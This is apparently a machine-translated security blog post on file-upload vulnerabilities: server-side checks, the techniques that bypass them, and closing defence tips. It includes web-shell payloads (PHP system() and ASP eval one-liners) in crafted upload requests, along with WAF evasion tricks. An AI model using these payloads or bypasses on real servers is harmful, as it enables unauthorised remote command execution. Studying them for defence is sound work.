File upload vulnerability (bypass gesture)

The file upload vulnerability can be said to be one of the most used vulnerabilities in daily penetration testing, because it is the fastest and most direct to obtain server permissions. But it’s not so easy to really make use of this vulnerability. There are a lot of skills and a lot of knowledge to master. As the saying goes, knowing oneself and knowing each other can be a battle, so if you want to study how to protect against loopholes, you must understand how to use it. This article is divided into three parts: summarizing some common upload file verification methods, and various postures to bypass the verification, and finally put forward some protection suggestions for this vulnerability. (According to personal experience, welcome to add corrections~~)

File upload verification posture

  • Client javascript check (generally only check the suffix name)
  • Server verification
  • File header content-type field checksum (image/gif)
  • File content header check (GIF89a)
  • suffix name blacklist check
  • suffix name whitelist check
  • Custom regular check
  • WAF device verification (depending on different WAF products)

1. Client verification

Generally, a javascript script is written on the webpage to verify the suffix name of the uploaded file, and there is also a blacklist form in the form of a whitelist.
Judgment method: When browsing the loading file, but the upload button has not been clicked, a dialog box pops up, such as: only the file with the .jpg/.jpeg/.png suffix name is allowed to be uploaded, and no data packet is sent at this time.

2. Server verification

2.1 Content-type field check

Here is the PHP code as an example to simulate the verification code of the web server.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
If($_FILES['userfile']['type'] != "image/gif") #This will judge the type of the uploaded file. If it is not the image/gif type, it will return an error.
{
echo "Sorry, we only allow uploading GIF images";
exit;
}
$uploaddir = 'uploads/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile))
{
echo "File is valid, and was successfully uploaded.\n";
} else {
echo "File uploading failed.\n";
}
?>

You can see that the code judged the file type of the uploaded file, and if it is not the image type, it returns an error.

2.2 File header verification

You can determine whether the contents of the file header meet the requirements by writing a regular match. Here are some common file header correspondences:


File upload bypass verification posture

  • Client bypass (catch change)
  • Server bypass
  • file type
  • File header
  • File suffix name
  • The cooperation file contains vulnerabilities bypassing
  • Cooperate with server parsing vulnerability to bypass
  • CMS, editor vulnerability bypass
  • bypassed with operating system file naming rules
  • bypassed with other rules
  • WAF bypass

1. Client bypass

You can use the burp to capture the package, first upload a gif type Trojan, and then change it to asp/php/jsp suffix by burp.

2. The server bypasses

2.1 File Type Bypass

We can change the content-type field to image/gif by capturing the package.

1
2
3
4
5
6
7
8
9
10
11
POST /upload.php HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: localhost
User-Agent: libwww-perl/5.803
Content-Type: multipart/form-data; boundary=xYzZY
Content-Length: 155
--xYzZY
Content-Disposition: form-data; name="userfile"; filename="shell.php"
<?php system($_GET['command']);?>
--xYzZY-

2.2 File header bypass

Add some file information to the Trojan content, a bit like the following structure
GIF89a<?php phpinfo(); ?>

2.3 File suffix name bypass

Prerequisite: Blacklist verification
Blacklist detection: There is usually a special blacklist file that contains common dangerous script files.
Bypass method:
(1) Find the missing net of the blacklist extension - such as asa and cer
(2) There may be case bypass loopholes - such as aSp and pHp
A list of file extensions that can be parsed:
jsp jspx jspf
asp asa cer aspx
php php php3 php4
exe exee

3. Mate file contains vulnerabilities

Prerequisite: The verification rule only verifies whether the file content with the file suffix named asp/php/jsp is a Trojan.
Bypass mode: (take php for example, this vulnerability mainly exists in PHP)
(1) First upload a txt suffix file whose content is a Trojan, because the relationship of the suffix name has no inspection content;
(2) Then upload a .php file with <?php Include(“uploaded txt file path”);?>
At this point, the php file will reference the contents of the txt file, bypassing the validation, and the following syntax is included:

1
2
3
4
5
6
7
8
#PHP
<?php Include("Uploaded txt file path");?>
#ASP
<!--#include file="Uploaded txt file path" -->
#JSP
<jsp:inclde page="Uploaded txt file path"/>
or
<%@include file="Uploaded txt file path"%>

Detailed reference: [file contains vulnerabilities (bypass posture)] (http://thief.one/2017/04/10/2/)

4. Cooperate with server parsing vulnerability

For details, please refer to: [http://thief.one/2016/09/21/Server Resolution Vulnerability/] (http://thief.one/2016/09/21/Server Resolution Vulnerability/)

5. Matching operating system file command rules

(1) Upload a file name that does not conform to the Windows file naming rules
Test.asp (space)
Will be automatically removed by the windows system does not meet the content behind the rules symbol.
(2) suffix name in linux
Under Linux, if the upload php is not parsed, you can try uploading the file name of the pHp suffix.

6.CMS, Editor Vulnerability

(1) CMS vulnerabilities: For example, vulnerabilities such as JCMS can be bypassed for upload vulnerabilities existing in different CMSs.
(2) Editor vulnerabilities: such as FCK, ewebeditor, etc., can be bypassed for editor vulnerabilities.
These two aspects of the loopholes are separately documented and summarized here.

7. Cooperate with other rules

(1) 0x00 truncation: based on a combinatorial logic vulnerability, usually exists when constructing the path to the uploaded file
Path /upload/1.php(0x00), filename 1.jpg, combined with /upload/1.php(0x00)/1.jpg
Pseudo code demo:

1
2
3
4
5
Name= getname(httprequest) //If the file name obtained at this time is help.asp.jpg (asp is 0x00)
Type =gettype(name) //And the way to handle it in gettype() is to scan the extension from back to front, so it is judged as jpg
if(type == jpg)
SaveFileToPath(UploadPath.name, name) // but here is truncated with 0x00 as the file name
/ / Finally saved in the path to help.asp

8.WAF bypass

8.1 Garbage data

In order to prevent the performance of the web server, some host WAF software will set the upper limit of the user data for verification, such as 1M. In this case, a large file can be constructed. The content of the first 1M is spam, and the content of the first Trojan is the real Trojan content, so that the WAF can verify the content of the file.

Of course, you can also put the junk data at the very beginning of the packet, so you can bypass the verification of the file name.

The garbage data can be added after the Content-Disposition parameter, and the parameter content is too long, which may cause the waf detection error.

8.2 filename

For an earlier version of the security dog, you can add a filename

Or change the filename to the location. If we change the writing method under IIS6.0, put the filename in other places:

8.3 POST/GET

Some WAF rules are: If the packet is of the POST type, the packet content is verified.
In this case, you can upload a POST-type data packet, and capture the packet to change POST to GET.

8.4 The above way

For WAF, the server resolution vulnerabilities and file inclusion vulnerabilities described above can be tried to bypass.

————————————————2017.2 .6 update———————————————– —

8.5 Using waf itself defects
Delete the Content-Type field in the entity


The first is to delete the entire line of Content, the second is to delete the characters behind C. Delete the ontent-Type: image/jpeg only leave c, add .php to c, but pay attention to the amount, double quotes should follow c.php.

1
C.php"

Delete spaces in the Content-Disposition field


Content-Type: multipart/form-data; boundary=—————————4714631421141173021852555099
Try adding a space or other character that can be processed normally after the boundary:
boundary= —————————47146314211411730218525550

Modify the case of the Content-Disposition field value

Boundary boundaries are inconsistent

The Boundary boundary is consistent every time a file is uploaded:

1
2
3
4
5
6
7
8
Content-Type: multipart/form-data; boundary=---------------------------4714631421141173021852555099
Content-Length: 253
-----------------------------4714631421141173021852555099
Content-Disposition: form-data; name="file1"; filename="shell.asp"
Content-Type: application/octet-stream
<%eval request("a")%>
-----------------------------4714631421141173021852555099--

However, if the container does not have strict requirements in the process of processing, it may cause a problem. The inconsistency between the two Boundary makes waf think that the data is meaningless, but the container is not so strict:
Win2k3 + IIS6.0 + ASP

Enter the file name

Multiple Content-Disposition

In the IIS environment, if there are multiple Content-Dispositions when uploading files, IIS will take the value of the first Content-Disposition as the receiving parameter, and if waf just takes the last one, it will be bypassed, Win2k8 + IIS7.0 + PHP

Using NTFS ADS Features

ADS is a feature of the NTFS disk format for NTFS exchange of data streams. When uploading a file, waf may cause bypass if the file name of the request body is not properly matched.

Additional situation supplement

File Renaming Bypass

If the web program renames the filename in addition to the extension, then you can construct more points, symbols, and so on.

Special long file name bypass

File names use non-alphanumeric characters, such as Chinese, which are maximally stretched. If not, combine them with other features to test:
Shell.asp; king king king king king king king king king king king king king king king king king king king king king king king king king king king king king king king king king king king king king king king king king King Wang Wang Wang Wang Wang Wang Wang Wang Wang Wang Wang Wang Wang Wang Wang Wang Wang Wang Wang Wang.jpg

Undelete

Change the file1 below to file4 so that it will not be deleted. (JCMS vulnerability)


Suggestions for document verification

  • File extension server whitelist verification.
  • File content server verification.
  • Upload file renamed.
  • Hide the path to the uploaded file.

The above points can protect most upload vulnerabilities, but need to be combined with the server container. If the resolution vulnerability still exists, there is no absolute security.

Reference article:
https://xianzhi.aliyun.com/forum/read/458.html?fpage=2

  • There is also a article on the big cattle on the tools, url can not be found temporarily…*

Portal

[File contains vulnerabilities (bypassing posture)] (http://thief.one/2017/04/10/2/)

本文标题:File upload vulnerability (bypass gesture)

文章作者:nmask

发布时间:2016年09月22日 - 11:09

最后更新:2019年07月11日 - 16:07

原始链接:https://thief.one/2016/09/22/Upload Trojan Posture Summary - Welcome to add/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

nmask wechat
欢迎您扫一扫上面的微信公众号,订阅我的博客!
坚持原创技术分享,您的支持将鼓励我继续创作!

热门文章推荐: